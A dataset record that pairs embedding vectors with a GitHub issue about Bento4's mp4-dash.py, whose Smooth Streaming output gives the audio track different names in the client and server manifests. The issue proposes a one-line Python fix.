0.008388004265725613, 0.005933857522904873, 0.004777230322360992, -0.0064482782036066055, 0.01672358252108097, 0.02736586332321167, 0.027759050950407982, 0.007051166146993637, -0.0067431689240038395, -0.0040268972516059875, 0.015557126142084599, 0.0036500925198197365, -0.00024410402693320066, -0.02197919227182865, 0.0007880136836320162, 0.027129951864480972, 0.024298999458551407, 0.023617474362254143, -0.0025475285947322845, 0.01414165087044239, 0.0034371158108115196, -0.017418215051293373, 0.020393334329128265, 0.014928026124835014, -0.0075033316388726234, 0.007601629011332989, -0.003186458721756935, -0.006074749864637852, -0.02549166977405548, -0.001364688971079886, -0.018361864611506462, 0.014823175966739655, 0.01032773032784462, 0.0032126710284501314, 0.022280635312199593, 0.0075033316388726234, -0.0013245510635897517, 0.031114252284169197, 0.016697371378540993, 0.012680303305387497, 0.006667808163911104, -0.01001973357051611, 0.012509921565651894, -0.014076119288802147, 0.019462790340185165, 0.007595075760036707, -0.021087966859340668, 0.017916252836585045, -0.006159940734505653, 0.026894038543105125, -0.004062939435243607, 0.012391965836286545, -0.009901776909828186, -0.012024990282952785, 0.0024754442274570465, 0.02035401575267315, 0.0058126249350607395, -0.006553128361701965, -0.0125885596498847, -0.011605590581893921, 0.02560962550342083, 0.038348905742168427, -0.0027605053037405014, -0.007798222824931145, 0.000580771011300385, 0.0009764161077328026, 0.02055061049759388, -0.011926693841814995, 0.018833691254258156, 0.007201888132840395, 0.004043280147016048, 0.023918917402625084, -0.006494150031358004, 0.00669074384495616, 0.009194038808345795, 0.014679007232189178, 0.006248407997190952, 0.014810069464147091, 0.005871602799743414, -0.008125878870487213, -0.006048537325114012, -0.012313327752053738, -0.0029374398291110992, 0.006182876415550709, -0.0013736995169892907, -0.0006426161271519959, -0.0058388374745845795, -0.0082569420337677, 0.005956793669611216, -0.0056160311214625835, 0.018007995560765266, -0.007385375443845987, 0.0010050860000774264, -0.009148167446255684, 0.014220288023352623, 0.0018922158051282167, -0.021140391007065773, -0.03549174219369888, 0.0024164661299437284, -0.0033535633701831102, -0.0014572518412023783, -0.03832269459962845, -0.008329026401042938, -0.0028571640141308308, 0.007752350531518459, -0.006589170545339584, -0.0012033181264996529, 0.0041514066979289055, -0.009423398412764072, 0.025740688666701317, -0.005304757505655289, -0.0029685671906918287, 0.00025311458739452064, -0.03208411484956741, 0.03239866718649864, 0.004600296262651682, -0.01435135118663311, -0.017916252836585045, 0.0036009440664201975, 0.02726101316511631, -0.018257014453411102, 0.02580621838569641, 0.02633046917617321, -0.0028456959407776594, 0.014364456757903099, 0.014980451203882694, 0.0016415585996583104, -0.004112088121473789, -0.012686856091022491, 0.010969936847686768, -0.0017382173100486398, -0.005553776398301125, 0.006025601644068956, -0.00451510539278388, -0.008781191892921925, 0.008473195135593414, -0.009488929994404316, -0.006064920220524073, -0.00047755922423675656, 0.009108847938477993, 0.017588596791028976, 0.0008871297468431294, -0.007811328861862421, 0.009659310802817345, 0.004194002132862806, 0.01265409030020237, 0.012529580853879452, -0.01631728932261467, 0.016762902960181236, 0.000252705009188503, -0.00003806445965892635, -0.019357940182089806, 0.0011861162493005395, -0.011238615028560162, -0.00928578246384859, 0.027916327118873596, 0.006749722175300121, -0.016291076317429543, -0.006782487966120243, 0.010131136514246464, -0.008545279502868652, 0.006264790426939726, 0.004629785194993019, -0.006615383084863424, -0.0057143280282616615, -0.02304079942405224, -0.006530192214995623, 0.01798178441822529, -0.0013933589216321707, 0.013499444350600243, -0.02809981442987919, 0.006481043994426727, 0.003147139912471175, -0.001282774843275547, 0.006874231621623039, -0.004639614839106798, -0.01981665939092636, 0.01146797463297844, -0.052818212658166885, -0.0021740002557635307, 0.007214994169771671, -0.0034076266456395388, 0.006327045150101185, 0.00038499629590660334, -0.021245241165161133, 0.015059088356792927, -0.0037025173660367727, 0.014115437865257263, -0.000051068323955405504, -0.007752350531518459, -0.003355201566591859, -0.01633039489388466, 0.009259570389986038, 0.008519066497683525, -0.03415490314364433, 0.04036727175116539, 0.007850647903978825, 0.00614683423191309, 0.02394513040781021, -0.008492854423820972, 0.014495519921183586, 0.0058126249350607395, -0.015373638831079006, -0.014665900729596615, 0.010655386373400688, -0.0091874860227108, 0.009737948887050152, 0.017693446949124336, -0.02809981442987919, -0.010196667164564133, -0.007319844327867031, 0.014285819604992867, 0.004977100994437933, -0.0034338391851633787, -0.014744538813829422, -0.013178341090679169, -0.01522947009652853, 0.03158607706427574, -0.029489077627658844, -0.009534801356494427, -0.002670399844646454, 0.0025966770481318235, -0.002219872083514929, 0.0206423532217741, -0.012221584096550941, 0.028781339526176453, -0.019056497141718864, -0.018230803310871124, 0.00018645697855390608, 0.007791669573634863, -0.0034698813688009977, 0.0005533297662623227, 0.017811402678489685, -0.021559791639447212, -0.013813994824886322, 0.009973861277103424, 0.016448352485895157, -0.0006901263259351254, 0.014757644385099411, 0.013191447593271732, 0.006166493520140648, 0.0020183634478598833, -0.016998814418911934, 0.0178507212549448, -0.023774748668074608, -0.010720917955040932, 0.00861736387014389, -0.001702175009995699, 0.011599036864936352, 0.0028653552290052176, -0.020157422870397568, 0.0174444280564785, -0.005851943511515856, -0.004469233565032482, -0.030118176713585854, -0.012156052514910698, -0.012608218938112259, -0.0027179098688066006, 0.007778563071042299, -0.03108804114162922, 0.02467908151447773, 0.015478488989174366, 0.02292284183204174, -0.009606885723769665, 0.010720917955040932, -0.01146797463297844, -0.006893890909850597, -0.010983043350279331, 0.01889922097325325, -0.014547945000231266, -0.031428802758455276, -0.0012229775311425328, -0.005435819737613201, -0.020314697176218033, -0.006100962404161692, -0.013191447593271732, -0.0026065066922456026, 0.014652795158326626, -0.004010514356195927, -0.016697371378540993, -0.013709144666790962, -0.007909625768661499, -0.007424694485962391, 0.0022657441440969706, 0.04078666865825653, 0.010871639475226402, 0.024508699774742126, -0.022162679582834244, -0.0031045444775372744, 0.00030758747016079724, -0.025793112814426422, -0.012850684113800526, 0.0017595149111002684, -0.005514457356184721, -0.006579340901225805, -0.0012188818072900176, 0.03622569143772125, -0.019135134294629097, -0.005596371367573738, 0.015268788672983646, -0.0039449832402169704, 0.013525656424462795, 0.005612754262983799, -0.012116733938455582, 0.007981710135936737, 0.013604294508695602, 0.0033748610876500607, -0.009633098728954792, 0.0021477877162396908, 0.00015215545136015862, 0.0020806181710213423, -0.006028878036886454, 0.013827100396156311, 0.00404983339831233, 0.0008289707475341856, -0.0018348759040236473, -0.0035419657360762358, 0.05213668942451477, -0.010177007876336575, -0.009626545011997223, -0.01702502742409706, 0.0012655728496611118, 0.02293594926595688, -0.02107486128807068, 0.02416793629527092, 0.008676341734826565, -0.007640947587788105, 0.02074720337986946, 0.004262810107320547, 0.0034829876385629177, 0.02220199815928936, -0.01847982220351696, 0.029908478260040283, -0.005425990093499422, -0.0032372453715652227, -0.030904551967978477, 0.05321140214800835, -0.0036009440664201975, 0.0031176507472991943, 0.011389336548745632, -0.0020183634478598833, -0.018545353785157204, -0.006395853124558926, -0.01929241046309471, -0.024534912779927254, 0.010930618271231651, 0.007595075760036707, 0.004852591548115015, 0.01089785248041153, 0.004806719720363617, 0.01942347176373005, 0.017011921852827072, 0.006405682768672705, -0.016998814418911934, 0.00032356070005334914, -0.002460699761286378, 0.005521010607481003, -0.00277524976991117, 0.00614683423191309, 0.012935874983668327, 0.03006575256586075, 0.0002506571472622454, -0.013204553164541721, 0.009593780152499676, 0.000257619860349223, -0.006284450180828571, 0.003961366135627031, 0.005566882435232401, -0.010367048904299736, 0.011834949254989624, 0.024128617718815804, 0.0057864123955369, -0.008859829045832157, 0.007549203932285309, -0.01450862642377615, 0.013748463243246078, 0.00903021078556776, 0.0018987689400091767, 0.008453535847365856, 0.015268788672983646, 0.012490262277424335, -0.004957441706210375, -0.02125834859907627, 0.0037385597825050354, 0.009692076593637466, 0.0011992225190624595, -0.014587263576686382, 0.021821917966008186, 0.006874231621623039, -0.017824508249759674, 0.01950210891664028, 0.033918991684913635, 0.006992187816649675, 0.00861736387014389, -0.008040688000619411, -0.008676341734826565, -0.02435142546892166, 0.005412884056568146, 0.02870270237326622 ]
1,807
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
**Used version** v1.6.0-637 (latest at the moment) **Scenario** Use mp4-dash.py util to generate Smooth Streaming compatible output by specifying `--smooth`. **Problem description** The track name in the audio URL template of the generated .ismc file mismatches the track name in the generated .ism file. Example audio URL template and the audio portion in the corresponding .ism file: ``` // URL template in .ismc QualityLevels({bitrate})/Fragments(English={start time}) ``` ``` // Audio portion in the corresponding .ism <audio src="tears_audio_eng.mp4" systemBitrate="136075"> <param name="trackID" value="1" valueType="data"/> <param name="trackName" value="audio_en" valueType="data"/> <param name="timeScale" value="44100" valueType="data"/> </audio> ``` The track name in the .ismc file `English` is supposed to match the one in the .ism file `audio_en`. **Cause** It seems it's introduced here: https://github.com/axiomatic-systems/Bento4/commit/4916daf0#diff-e47888547647a4f042e89b39ca9f3db16ff8ec57ae8bf7eed250d050c6139061L1007 **Possible fix** ``` diff --git a/Source/Python/utils/mp4-dash.py b/Source/Python/utils/mp4-dash.py index a9234b1..ce398d3 100755 --- a/Source/Python/utils/mp4-dash.py +++ b/Source/Python/utils/mp4-dash.py @@ -1026,7 +1026,7 @@ def OutputSmooth(options, audio_tracks, video_tracks): stream_name = audio_track.language_name if stream_name == '' or stream_name == 'Unknown': stream_name = "audio_"+audio_track.language - audio_url_pattern="QualityLevels({bitrate})/Fragments(%s={start time})" % (stream_name) + audio_url_pattern="QualityLevels({bitrate})/Fragments(audio_%s={start time})" % (audio_track.language) stream_index = xml.SubElement(client_manifest, 'StreamIndex', Chunks=str(len(audio_track.moofs)), ```
Mismatch of audio track name between generated smooth client and server manifest
https://api.github.com/repos/axiomatic-systems/Bento4/issues/599/comments
5
2021-04-21T07:16:11
2022-03-09T07:27:18Z
https://github.com/axiomatic-systems/Bento4/issues/599
863,526,874
599
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Mismatch of audio track name between generated smooth client and server manifest Issue date: --- start body --- **Used version** v1.6.0-637 (latest at the moment) **Scenario** Use mp4-dash.py util to generate Smooth Streaming compatible output by specifying `--smooth`. **Problem description** The track name in the audio URL template of the generated .ismc file mismatches the track name in the generated .ism file. Example audio URL template and the audio portion in the corresponding .ism file: ``` // URL template in .ismc QualityLevels({bitrate})/Fragments(English={start time}) ``` ``` // Audio portion in the corresponding .ism <audio src="tears_audio_eng.mp4" systemBitrate="136075"> <param name="trackID" value="1" valueType="data"/> <param name="trackName" value="audio_en" valueType="data"/> <param name="timeScale" value="44100" valueType="data"/> </audio> ``` The track name in the .ismc file `English` is supposed to match the one in the .ism file `audio_en`. **Cause** It seems it's introduced here: https://github.com/axiomatic-systems/Bento4/commit/4916daf0#diff-e47888547647a4f042e89b39ca9f3db16ff8ec57ae8bf7eed250d050c6139061L1007 **Possible fix** ``` diff --git a/Source/Python/utils/mp4-dash.py b/Source/Python/utils/mp4-dash.py index a9234b1..ce398d3 100755 --- a/Source/Python/utils/mp4-dash.py +++ b/Source/Python/utils/mp4-dash.py @@ -1026,7 +1026,7 @@ def OutputSmooth(options, audio_tracks, video_tracks): stream_name = audio_track.language_name if stream_name == '' or stream_name == 'Unknown': stream_name = "audio_"+audio_track.language - audio_url_pattern="QualityLevels({bitrate})/Fragments(%s={start time})" % (stream_name) + audio_url_pattern="QualityLevels({bitrate})/Fragments(audio_%s={start time})" % (audio_track.language) stream_index = xml.SubElement(client_manifest, 'StreamIndex', Chunks=str(len(audio_track.moofs)), ``` --- end body ---
2,145
[ 0.00003168685361742973, 0.009922991506755352, -0.014949719421565533, 0.022838996723294258, -0.05006774887442589, 0.02441992238163948, -0.022286441177129745, 0.03229385241866112, -0.045892875641584396, 0.028134329244494438, 0.004071265924721956, 0.026645496487617493, -0.01277786586433649, 0.048962634056806564, -0.008096485398709774, 0.021135281771421432, 0.010467873886227608, 0.011258335784077644, -0.0037144068628549576, 0.020536677911877632, 0.04257753863930702, -0.01858738251030445, -0.0007396197179332376, -0.0013247922761365771, -0.01648459956049919, 0.03078966960310936, -0.024051550775766373, 0.01831110380589962, 0.003547488711774349, 0.00501137925311923, 0.01755901426076889, 0.006262305658310652, -0.020536677911877632, 0.03235524520277977, 0.01794273406267166, 0.03361384570598602, 0.031234784051775932, 0.05298401787877083, -0.012831587344408035, -0.007570789661258459, -0.021580396220088005, -0.03809569403529167, 0.011035778559744358, -0.0018341802060604095, -0.005283820442855358, 0.012102519161999226, -0.04420451074838638, 0.03576267510652542, -0.006223933771252632, -0.004393590614199638, 0.01657669059932232, -0.03468826040625572, -0.05362866818904877, -0.007628347724676132, 0.011181592009961605, -0.028993861749768257, 0.04110405594110489, 0.0033690589480102062, -0.009823224507272243, 0.010214618407189846, -0.0005563935847021639, -0.012570657767355442, 0.005851725582033396, 0.0030467344913631678, 0.030482694506645203, -0.010636710561811924, -0.023468296974897385, 0.01824970915913582, -0.0069146291352808475, 0.03852545842528343, -0.009930665604770184, 0.020106913521885872, 0.03223245590925217, 0.045616600662469864, 0.0032865593675523996, -0.065017469227314, 0.03505663201212883, 0.032324548810720444, -0.002144993282854557, -0.007352069485932589, -0.03861755132675171, -0.030835716053843498, -0.012808564119040966, 0.021365514025092125, 0.036008257418870926, 0.007283000275492668, -0.04337567463517189, -0.04165661334991455, -0.0070604425854980946, -0.03111199475824833, 0.0015838030958548188, -0.024987827986478806, 0.02782735414803028, -0.032600827515125275, -0.022455276921391487, 0.005230099428445101, -0.013299725018441677, -0.004811845254153013, -0.07023605704307556, -0.02122737467288971, -0.026369217783212662, -0.03471896052360535, 0.001642320305109024, -0.014320419169962406, 0.048532869666814804, -0.000521379173733294, 0.010153223760426044, -0.028456654399633408, 0.005821027792990208, 0.098723404109478, 0.043836139142513275, 0.005352890118956566, -0.007091140374541283, -0.050528209656476974, -0.004006033763289452, 0.007083465810865164, -0.0055639357306063175, -0.0308971107006073, -0.004416613839566708, 0.002845281735062599, -0.011757171712815762, -0.01966179721057415, -0.03723616153001785, 0.02684503048658371, -0.041994284838438034, 0.050804488360881805, -0.05261564627289772, -0.004132661037147045, 0.014274372719228268, 0.0038525459822267294, 0.005782655905932188, -0.02695247158408165, 0.005149518605321646, 0.0049154493026435375, 0.0004940391518175602, 0.0035129538737237453, -0.04024452343583107, 0.012133217416703701, 0.010621361434459686, -0.030068276450037956, -0.018403196707367897, -0.030436648055911064, 0.06649094820022583, 0.01717529445886612, -0.021043188869953156, -0.022700857371091843, 0.024281783029437065, 0.02095109596848488, -0.02009156346321106, 0.0060666087083518505, -0.011012755334377289, -0.05979887768626213, 0.015003440901637077, 0.028702234849333763, 0.05292262136936188, 0.00615870114415884, 0.0010571477469056845, -0.03959987312555313, -0.0009784852154552937, 0.03683709353208542, 0.01749761961400509, -0.0003925932396668941, 0.011979728937149048, 0.02036784216761589, 0.016453901305794716, -0.035517096519470215, 0.011657404713332653, 0.040919870138168335, -0.018433894962072372, 0.024880385026335716, -0.025095269083976746, 0.0349031463265419, -0.020199004560709, -0.01976924017071724, -0.039292898029088974, -0.018433894962072372, 0.025617128238081932, -0.013867630623281002, -0.030114322900772095, 0.02257806807756424, -0.04306869953870773, 0.00861834455281496, 0.012148565612733364, 0.010736477561295033, -0.003754697274416685, -0.017804594710469246, 0.03570128232240677, 0.006553932558745146, 0.0179887805134058, 0.011158568784594536, 0.005571610294282436, 0.013683444820344448, 0.04015243053436279, -0.0014312744606286287, 0.01815761625766754, 0.01938552036881447, -0.011864613741636276, -0.026752937585115433, 0.014688790775835514, 0.032109666615724564, 0.02699851803481579, -0.022731555625796318, 0.008810204453766346, -0.03453477472066879, -0.03969196602702141, 0.02738223783671856, -0.02577061578631401, 0.03809569403529167, 0.010721128433942795, -0.01917063631117344, -0.02577061578631401, -0.011549963615834713, 0.03917010873556137, 0.027781307697296143, 0.0024692362640053034, 0.0029623161535710096, 0.02577061578631401, 0.028241770341992378, 0.004121149890124798, -0.017804594710469246, 0.004132661037147045, -0.029101302847266197, 0.016392506659030914, 0.0008149247150868177, -0.008541600778698921, -0.009147877804934978, 0.014765534549951553, -0.021948767825961113, -0.013476235792040825, -0.020536677911877632, 0.037727322429418564, 0.02161109447479248, -0.03806499391794205, -0.008249973878264427, 0.023637134581804276, -0.0018313023028895259, -0.0013228737516328692, -0.006258468609303236, -0.0017161864088848233, -0.033521752804517746, -0.01901714876294136, 0.026169683784246445, -0.011242987588047981, -0.024512015283107758, -0.008710437454283237, -0.020229702815413475, 0.02523340843617916, -0.010667407885193825, -0.02566317468881607, 0.013315074145793915, -0.00523777399212122, -0.017359480261802673, 0.01723668910562992, 0.006665211170911789, -0.04435799643397331, 0.023545041680336, 0.012539960443973541, 0.00280307256616652, 0.0393235944211483, -0.05829469859600067, 0.00504975114017725, -0.004128823988139629, -0.031142691150307655, 0.007942997850477695, 0.024941781535744667, -0.07152535021305084, -0.005679051857441664, -0.035731978714466095, -0.023099927231669426, -0.006707420572638512, -0.002705223858356476, 0.005122658330947161, -0.044542182236909866, 0.005874748807400465, -0.011987403966486454, -0.01809622161090374, 0.06114957109093666, 0.006672885734587908, 0.013468561694025993, -0.015057161450386047, 0.024865036830306053, 0.057557955384254456, 0.03959987312555313, 0.02026040107011795, -0.00828834529966116, 0.01412855926901102, 0.015126231126487255, -0.009309040382504463, -0.04076638072729111, 0.013338097371160984, 0.005740446969866753, 0.01814226806163788, -0.01691436395049095, 0.008226950652897358, -0.005341378506273031, -0.006461839657276869, -0.001906127668917179, 0.03183338791131973, 0.00342277972958982, 0.010222293436527252, -0.02251667156815529, 0.021488303318619728, -0.03040594980120659, -0.018971102312207222, -0.024128295481204987, 0.029101302847266197, -0.013714142143726349, 0.0060397484339773655, -0.04807240515947342, 0.017267387360334396, 0.01949296146631241, 0.0002875499485526234, -0.03315338119864464, -0.0021622604690492153, 0.011680427938699722, 0.010252990759909153, -0.015164602547883987, -0.0236678309738636, -0.04619985446333885, 0.0006647944101132452, -0.03385942801833153, 0.0009967118967324495, -0.042700327932834625, -0.012885307893157005, -0.005514052230864763, -0.03327617421746254, -0.013952048495411873, -0.0021833651699125767, -0.014542977325618267, 0.007210093084722757, 0.01307716779410839, 0.013906002044677734, 0.030436648055911064, -0.025571081787347794, 0.0034093495924025774, 0.029193395748734474, -0.0012845017481595278, -0.011020430363714695, 0.012447867542505264, 0.006749629508703947, 0.004393590614199638, -0.00569823756814003, 0.009546946734189987, 0.025248756632208824, -0.006365910172462463, 0.007482534274458885, 0.003113885410130024, 0.01944691501557827, 0.02841060794889927, -0.009431830607354641, 0.0010149385780096054, 0.012532285414636135, 0.0264152642339468, -0.006051259580999613, -0.0021680162753909826, -0.027259448543190956, -0.021687837317585945, -0.0027819678653031588, 0.050098445266485214, 0.01455832552164793, -0.0037681276444345713, -0.04834868386387825, 0.03453477472066879, 0.025202710181474686, 0.023805970326066017, -0.02105853706598282, -0.020229702815413475, 0.03471896052360535, -0.0036721976939588785, -0.02560177817940712, -0.0059745158068835735, 0.016269715502858162, -0.041994284838438034, 0.0280882827937603, -0.020889701321721077, 0.0007084425305947661, 0.02879432775080204, 0.005751958582550287, -0.03548640012741089, 0.03754313662648201, 0.012946702539920807, 0.006638350896537304, 0.017912035807967186, -0.007206256035715342, 0.008518577553331852, 0.003344117198139429, 0.0004232907958794385, 0.008012067526578903, -0.010383455082774162, -0.025095269083976746, -0.03539430722594261, 0.014566000550985336, -0.03318408131599426, -0.051510535180568695, -0.006891605909913778, -0.0037067322991788387, -0.03117338940501213, -0.03404361382126808, 0.008556949906051159, -0.023944109678268433, 0.028487350791692734, -0.021749233826994896, 0.03539430722594261, 0.026983169838786125, 0.004412776790559292, 0.025310151278972626, -0.0076820687390863895, -0.019324123859405518, 0.0005400854861363769, 0.013729491271078587, -0.01323065534234047, 0.008027416653931141, 0.0037566160317510366, 0.0016720585990697145, 0.021733883768320084, 0.01272414531558752, 0.010820895433425903, 0.029254790395498276, -0.03318408131599426, 0.0032865593675523996, 0.002171853557229042, -0.04260823503136635, -0.0020337144378572702, 0.0236064363270998, 0.03019106574356556, 0.02630782313644886, -0.03126548230648041, -0.0036299885250627995, 0.01852598786354065, -0.010851593688130379, 0.020383190363645554, -0.031526412814855576, 0.04110405594110489, -0.010391130112111568, -0.01781994290649891, 0.008226950652897358, -0.006834047846496105, -0.031679898500442505, 0.011035778559744358, -0.02015295997262001, -0.004857891704887152, 0.02242458052933216, 0.04939240217208862, 0.040490102022886276, -0.0074134645983576775, -0.04067428782582283, -0.015901343896985054, -0.023360855877399445, -0.03720546141266823, 0.019462263211607933, 0.015080184675753117, 0.04165661334991455, 0.0014408675488084555, -0.004800333641469479, 0.0026208055205643177, -0.0020241213496774435, -0.003173361998051405, -0.019078543409705162, 0.04082777723670006, -0.012685773894190788, -0.03226315230131149, 0.01938552036881447, 0.015202974900603294, -0.003983010537922382, 0.017221340909600258, -0.019569704309105873, -0.02836456149816513, -0.007881603203713894, 0.011596009135246277, 0.027796655893325806, -0.013545305468142033, -0.008449507877230644, 0.021165980026125908, 0.015509950928390026, -0.031158041208982468, 0.02004551701247692, -0.021595744416117668, -0.06575421243906021, 0.04128824174404144, -0.022225044667720795, -0.009209273383021355, -0.014212978072464466, 0.00008531767525710166, 0.0017420874210074544, -0.007996718399226665, 0.03278501331806183, -0.0225320216268301, 0.021887371316552162, -0.04629194736480713, 0.02036784216761589, 0.018464593216776848, 0.026921775192022324, 0.04018312692642212, -0.024020854383707047, -0.005157192703336477, 0.006070445757359266, -0.001865837024524808, -0.025970149785280228, 0.017205990850925446, 0.0005185012705624104, -0.022946437820792198, 0.0179887805134058, 0.03542500361800194, -0.019032496958971024, -0.0020394702441990376, -0.012248333543539047, -0.026614798232913017, 0.06685931980609894, -0.0006465677288360894, -0.020736213773489, 0.0014274372952058911, 0.001548308995552361, 0.0008283549104817212, -0.010168571956455708, -0.0007295471150428057, -0.006972187198698521, -0.010521594434976578, -0.010621361434459686, 0.025847358629107475, -0.015532974153757095, -0.00453556701540947, -0.034596167504787445, 0.013215307146310806, 0.042331960052251816, -0.004263125825673342, 0.006174050271511078, 0.037512440234422684, 0.0132076321169734, -0.00037844356847926974, -0.02857944369316101, -0.02096644416451454, -0.019585054367780685, 0.02069016732275486, 0.01139647513628006, -0.032754313200712204, 0.0225320216268301, -0.014604371972382069, 0.013453212566673756, -0.012570657767355442, -0.011680427938699722, -0.0020394702441990376, 0.0315571092069149, -0.04635334014892578, 0.013836932368576527, -0.04592357575893402, 0.024818990379571915, 0.017850641161203384, -0.027950143441557884, -0.004243940114974976, -0.00285679311491549, 0.03898592293262482, -0.021733883768320084, 0.012140891514718533, 0.0253408495336771, 0.005287657491862774, 0.029776649549603462, -0.01794273406267166, 0.011772520840168, -0.011166243813931942, 0.019861331209540367, -0.024174341931939125, -0.002881735097616911, 0.04322218894958496, 0.03711336851119995, -0.0023828994017094374, 0.004765798803418875, 0.010352757759392262, 0.016192970797419548, -0.02905525639653206, -0.002993013709783554, -0.00504975114017725, -0.01987668126821518, 0.03315338119864464, -0.015855297446250916, -0.001864877762272954, 0.038863133639097214, 0.0252794548869133, 0.013199958018958569, 0.0032270827796310186, -0.007190907374024391, 0.007263814099133015, -0.024266434833407402, 0.003363303141668439, -0.0057097491808235645, 0.003547488711774349, -0.0036165581550449133, -0.010437175631523132, -0.00410580076277256, -0.016131576150655746, 0.0014667685609310865, 0.004723589401692152, 0.007501720450818539, -0.01399042084813118, -0.013184608891606331, 0.00917857512831688, 0.012440192513167858, -0.04316079244017601, -0.01358367782086134, 0.054917965084314346, 0.009170901030302048, 0.011020430363714695, 0.04985286295413971, -0.0131769347935915, -0.015648089349269867, -0.02793479524552822, 0.013798560947179794, -0.002231330145150423, 0.01539483480155468, -0.004428125452250242, 0.026384567841887474, -0.02311527542769909, 0.00610498059540987, 0.0595226027071476, 0.004247777163982391, 0.007359744049608707, 0.03511802852153778, 0.0280882827937603, 0.01496506854891777, 0.04211707413196564, 0.01680692285299301, 0.02495712973177433, -0.0270138680934906, 0.002121970057487488, -0.023805970326066017, 0.007774161174893379, 0.036376629024744034, 0.014274372719228268, -0.015057161450386047, -0.0021948767825961113, -0.0009602585923857987, -0.06035143509507179, -0.004151847213506699, -0.030774321407079697, -0.012079496867954731, 0.000207328557735309, -0.003507198067381978, -0.0028088283725082874, -0.03867894783616066, 0.003129234304651618, -0.03106594830751419, -0.010590664111077785, -0.0042132423259317875, -0.029254790395498276, 0.03269292041659355, -0.010053456760942936, 0.028548745438456535, -0.009930665604770184, 0.013107865117490292, -0.0016787736676633358, 0.00031441033934243023, -0.03284640610218048, -0.000984241021797061, -0.005429633893072605, 0.014274372719228268, 0.0019262729911133647, -0.025632476434111595, 0.013767862692475319, 0.009754154831171036, 0.00996903795748949, -0.02204086072742939, -0.009385784156620502, -0.01706785336136818, 0.0012643564259633422, -0.01307716779410839, 0.03674500063061714, 0.00584788853302598, 0.011902985163033009, -0.008096485398709774, -0.027520377188920975, 0.008203927427530289, 0.008334391750395298, -0.041134752333164215, 0.006891605909913778, 0.019784588366746902, -0.006811024621129036, -0.004048242699354887, -0.029316185042262077, 0.0014408675488084555, -0.008871600031852722, -0.045248229056596756, -0.010982058010995388, -0.0315571092069149, -0.006630676332861185, -0.005629167892038822, 0.0315571092069149, -0.0017651106463745236, 0.022056208923459053, -0.0026495845522731543, -0.0019195578061044216, -0.01815761625766754, 0.01815761625766754, 0.0053912620060145855, 0.007025907747447491, 0.005310680717229843, 0.026722241193056107, -0.02062877081334591, 0.0016883667558431625, -0.003478419268503785, -0.02739758789539337, -0.015325765125453472, 0.0005966841708868742, -0.008940668776631355, 0.0072407908737659454, -0.0011770601850003004, 0.010851593688130379, 0.04181009903550148, 0.003464988898485899, -0.03229385241866112, 0.003582023549824953, -0.012862284667789936, -0.004669868852943182, -0.014389488846063614, -0.00867206510156393, 0.009876945056021214, -0.0003232838644180447, -0.003234757110476494, -0.002089353743940592, -0.0051802159287035465, -0.04202498123049736, 0.03560918942093849, -0.009416481480002403, 0.012371123768389225, 0.015133905224502087, -0.02793479524552822, -0.0006815821398049593, 0.008626018650829792, -0.007474859710782766, 0.01137345191091299, -0.019308775663375854, 0.011534614488482475, -0.03008362464606762, -0.0287482813000679, -0.013821584172546864, 0.02782735414803028, -0.04187149554491043, 0.0031944664660841227, -0.020199004560709, -0.020183656364679337, 0.035455700010061264, 0.023805970326066017, -0.020889701321721077, -0.018725521862506866, 0.0016442389460280538, -0.002315748482942581, -0.02064412087202072, -0.001693163183517754, 0.0016049076803028584, -0.004485683515667915, -0.011074150912463665, -0.017252037301659584, 0.01547925267368555, -0.04985286295413971, 0.0035781862679868937, -0.054426804184913635, 0.006009050644934177, 0.008365090005099773, 0.02782735414803028, -0.021733883768320084, -0.010291362181305885, -0.0065040490590035915, 0.015555997379124165, -0.017958082258701324, 0.00022135830658953637, -0.008549274876713753, 0.007340557873249054, -0.021165980026125908, -0.005138006992638111, -0.005164867267012596, 0.012033450417220592, -0.020060867071151733, 0.017405526712536812, -0.01223298441618681, -0.02311527542769909, -0.023084577172994614, 0.032877106219530106, -0.022501323372125626, 0.0038602203130722046, 0.017697153612971306, -0.004773473367094994, -0.011074150912463665, -0.03625383973121643, 0.005210913717746735, -0.02997618354856968, 0.016331110149621964, -0.012202287092804909, -0.018832962960004807, -0.0006192277069203556, -0.00318103632889688, -0.015732508152723312, -0.011097174137830734, -0.004274637438356876, -0.012900657020509243, 0.020674817264080048, -0.03339896351099014, 0.010199270211160183, -0.007919974625110626, 0.010222293436527252, 0.01361437514424324, -0.03158780559897423, 0.012240658514201641, -0.01080554723739624, 0.014711814001202583, -0.007889277301728725, -0.027673864737153053, 0.021948767825961113, -0.0393235944211483, -0.008142531849443913, -0.011081825010478497, -0.006312189158052206, 0.028702234849333763, -0.009170901030302048, 0.00035973722697235644, 0.006396607495844364, -0.0089943902567029, 0.033890124410390854, 0.0019425810314714909, 0.018341802060604095, 0.010114851407706738, 0.004259288776665926, 0.01439716387540102, -0.02765851654112339, -0.004938472528010607, 0.00953159760683775, -0.010559966787695885, 0.0146120460703969, -0.008249973878264427, -0.0012758680386468768, 0.0043475441634655, 0.01766645535826683, -0.02015295997262001, -0.04521752893924713, -0.010206944309175014, -0.001145403366535902, 0.014090187847614288, -0.04368264973163605, 0.005748121067881584, 0.029085954651236534, -0.018679475411772728, -0.026660844683647156, 0.015747856348752975, -0.0031771992798894644, -0.031158041208982468, -0.019078543409705162, 0.005560098681598902, 0.02386736497282982, -0.03425849601626396, -0.020076215267181396, -0.016024135053157806, 0.029730603098869324, 0.006246956996619701, -0.003284640610218048, 0.04153382033109665, 0.044051021337509155, 0.017420874908566475, -0.006926140747964382, -0.019799936562776566, 0.017252037301659584, 0.030835716053843498, 0.01824970915913582, -0.014466232620179653, 0.03499523922801018, 0.020920397713780403, -0.02495712973177433, -0.020536677911877632, 0.011734148487448692, -0.008349740877747536, 0.0015003440203145146, -0.07349000126123428, -0.0003969100653193891, -0.02062877081334591, -0.0010744151659309864, -0.014658092521131039, -0.005966841243207455, -0.004140335600823164, -0.015310415998101234, 0.00945485383272171, -0.019477613270282745, 0.008165555074810982, 0.01646924950182438, -0.0030851063784211874, -0.029024558141827583, 0.03009897470474243, -0.016945062205195427, -0.02679898403584957, 0.015901343896985054, -0.017528316006064415, 0.016070181503891945, 0.015087858773767948, -0.018710173666477203, -0.026231078431010246, 0.025509685277938843, 0.049668680876493454, -0.009216947481036186, 0.018433894962072372, 0.009577644057571888, 0.01824970915913582, 0.00523777399212122, -0.05098867416381836, -0.009777178056538105, -0.015732508152723312, -0.006584630347788334, 0.001394821098074317, -0.019523657858371735, -0.007850904949009418, -0.010606012307107449, 0.018863661214709282, 